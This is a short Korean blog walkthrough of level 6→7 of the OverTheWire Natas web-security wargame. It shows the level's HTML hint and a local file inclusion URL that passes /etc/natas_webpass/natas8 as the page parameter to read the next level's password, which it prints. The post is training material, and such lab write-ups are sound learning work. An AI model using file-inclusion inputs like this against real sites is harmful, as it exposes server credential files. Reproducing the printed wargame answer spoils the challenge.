Natas Level 6 → Level 7
Username: natas7
URL: http://natas7.natas.labs.overthewire.org
<div id="content">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
Home 버튼을 클릭하면
<div id="content">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
this is the front page
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
About 버튼을 클릭하면
<div id="content">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
this is the about page
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
별 내용없다...
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
에 접속하면 패스워드가 나온다.
답은 DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 이다
'보안 > Natas' 카테고리의 다른 글
| Natas Level 9 - 커맨드인젝션 (0) | 2017.02.08 |
|---|---|
| Natas Level 8 - php코드가 존재할 때 2 (0) | 2017.02.08 |
| Natas Level 6 - php 코드가 존재할 때 (0) | 2017.02.08 |
| Natas Level 5 - 쿠키변조 (0) | 2017.02.08 |
| Natas Level 4 - 인증우회 (0) | 2017.02.08 |
